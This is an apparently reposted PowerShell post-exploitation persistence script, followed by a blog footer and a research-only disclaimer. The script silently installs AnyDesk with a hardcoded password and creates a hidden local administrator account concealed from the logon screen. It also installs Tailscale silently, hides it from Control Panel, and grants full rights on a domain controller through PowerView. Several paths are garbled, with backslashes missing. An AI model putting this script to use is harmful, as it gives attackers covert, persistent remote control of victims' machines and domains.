"[*] Download AnyDesk"
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\windows\temp\AnyDesk.exe"
$clnt.DownloadFile($url,$file)
"[*] Install anydesk"
cmd.exe /c "c:\windows\temp\AnyDesk.exe --install C:Users%USERNAME%AppDataLocalAnyDesk --start-with-win --silent"
"[*] set anydesk Admin!@#45"
cmd.exe /c "echo Admin!@#45 | C:Users%USERNAME%AppDataLocalAnyDeskAnyDesk.exe --set-password"
cmd.exe /c 'del c:\windows\temp\AnyDesk.exe > nul 2>&1'
"[*] Creat user default"
"[*] Set default Whoami!@#45"
cmd.exe /c 'net user default "Whoami!@#45" /add > nul 2>&1'
"[*] Add user to admin"
cmd.exe /c 'net localgroup Administrators default /add > nul 2>&1'
cmd.exe /c 'reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist" /v default /t REG_DWORD /d 0 /f > nul 2>&1'
sleep 3
cmd.exe /c "for /f ""delims="" %i in ('C:Users%USERNAME%AppDataLocalAnyDeskAnyDesk.exe --get-id') do echo %i" > ID.txt
$id = Get-Item -Path .ID.txt | Get-Content -Tail 1
"[*] ID anydesk $id"
$ping = ping -n3 pkgs.tailscale.com -w5 | findstr "bytes=32"
if ($ping-match"bytes=32") {
"[*] Ativando suporte a TSL versao 1, 1.1, 1.2, 1.3"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls,[Net.SecurityProtocolType]::Tls11,[Net.SecurityProtocolType]::Tls12,[Net.SecurityProtocolType]::Ssl3
[Net.ServicePointManager]::SecurityProtocol = "Tls, Tls11, Tls12, Ssl3"
$status = (get-service tailscale).DisplayName 2> $nul
if ($status-match'tailscale') {
"[*] TailScale is already part of the system"
}
else
{
try
{
$Response = Invoke-WebRequest-Uri"https://pkgs.tailscale.com/stable/tailscale-setup-1.78.1-arm64.msi"
$StatusCode = $Response.StatusCode
} catch {
$StatusCode = $_.Exception.Response.StatusCode.value__
}
if ($StatusCode-match'200') {
"[*] Downloading Tailscale..."
$ProgressPreference = 'SilentlyContinue';
Measure-Command-Expression {
Invoke-WebRequest-Uri https://pkgs.tailscale.com/stable/tailscale-setup-1.76.6-amd64.msi -OutFile$env:publictailscale-setup-1.76.6-amd64.msi
} -ErrorAction'SilentlyContinue' | Out-Null
}
else
{
"[*] Page not found"
}
$msi = Test-Path$env:publictailscale-setup-1.76.6-amd64.msi -ErrorAction'SilentlyContinue'
if ($msi-eq"true")
{
"[*] Installing Tailscale..."
msiexec.exe /i $env:publictailscale-setup-1.76.6-amd64.msi TS_CHECKUPDATES="never" TS_INSTALLUPDATES="never" TS_NOLAUNCH="1" TS_UPDATEMENU="hide" /qn | Out-Null
sleep3
"[*] Hiding Tailscale from Control Panel..."
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstall{4C041253-D35B-5889-A173-B08110EB2062}" /v SystemComponent /t REG_DWORD /d 1 /f | Out-Null
"[*] Installation completed!"
}
else
{
"[*] Error downloading the file..."
"[*] - Installation file not found..."
}
}
}
else
{
"[!] Installation was aborted! Possible disconnection with the domain pkgs.tailscale.com"
"[!] - No connection to the domain pkgs.tailscdale.com"
}
Add-DomainObjectAcl -TargetIdentity "DC" -PrincipalIdentity $sid -Rights All-Verbose
原文始发于微信公众号(looch):后渗透维权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论